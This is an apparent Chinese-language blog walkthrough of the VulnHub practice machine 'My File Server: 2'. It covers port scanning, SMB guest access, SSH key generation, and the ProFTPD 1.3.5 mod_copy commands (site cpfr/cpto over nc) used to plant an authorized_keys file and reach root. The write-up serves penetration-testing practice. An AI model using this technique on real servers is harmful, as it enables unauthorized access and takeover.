看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

Vulnhub靶机My File Server: 2渗透测试详解

    • Vulnhub靶机介绍:
    • Vulnhub靶机下载:
    • Vulnhub靶机安装:
    • Vulnhub靶机漏洞详解:
        • ①:信息收集:
        • ②:FTP匿名登入
        • ③:SSH私钥登入
        • ④:SMB共享服务:
        • ⑤:漏洞发现(ProFTPD 1.3.5):
        • ⑥:漏洞利用:
    • Vulnhub靶机渗透总结:

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这是一个漏洞靶机,老样子需要找到flag即可。

Vulnhub靶机下载:

官方下载:https://download.vulnhub.com/myfileserver/My_file_server_2.ova

Vulnhub靶机安装:

下载好了把安装包解压 然后使用Oracle VM打开即可。
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2_第1张图片

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2_第2张图片

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机

渗透机:kali IP :192.168.0.104 靶机IP :192.168.0.103

使用命令:nmap -sS -sV -A -n -p- 192.168.0.103

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2_第3张图片
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2_第4张图片

发现开启了很多端口 先使用工具老样子扫描80端口 dirsearch 发现了一个readme.txt 得到一个密码:root/root1

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2_第5张图片
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2_第6张图片

②:FTP匿名登入

尝试FTP登入 发现没有权限 尝试匿名发现里面也没有可以利用的信息。

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2_第7张图片
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2_第8张图片

③:SSH私钥登入

接着尝试SSH登入失败,需要私钥才能登入!

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2_第9张图片

④:SMB共享服务:

这里还有个文件共享服务Smb 先尝试使用smbmap 进行扫描查看文件,发现存在私钥文件 等下生成一个进行替换即可。

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2_第10张图片
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2_第11张图片
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2_第12张图片

smbclient '\\192.168.159.187\smbdata' guest  #登入smb

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2_第13张图片
生成私钥:ssh-keygen

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2_第14张图片
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2_第15张图片

⑤:漏洞发现(ProFTPD 1.3.5):

这里还有个2121端口 发现版本号为:ProFTPD 1.3.5 使用本地漏洞库searchsploit搜一下看看有没有相关利用文件

在这里插入图片描述

⑥:漏洞利用:

发现存在文件复制漏洞尝试利用:

nc 192.168.0.103 2121
site cpfr /smbdata/authorized_keys
site cpto /home/smbuser/.ssh/authorized_keys 	# 一般服务创建时会同时建一个smbuser用户

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2_第16张图片

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2_第17张图片

直接ssh 登入smbuser用户 su root 输入上面获取到的密码直接是root权限了

看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2_第18张图片

在这里插入图片描述
至此获取到了flag,渗透测试结束。

Vulnhub靶机渗透总结:

这个靶机难度适中
1.信息收集 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster
2.smb共享 smbmap枚举(工具得使用)ssh私钥登入
3.ProFTPD 1.3.5文件复制漏洞利用

希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

你可能感兴趣的:(渗透测试,#,Vulnhub靶机,ProFTPD漏洞利用,ssh私钥登入,Smb共享服务,smbmap)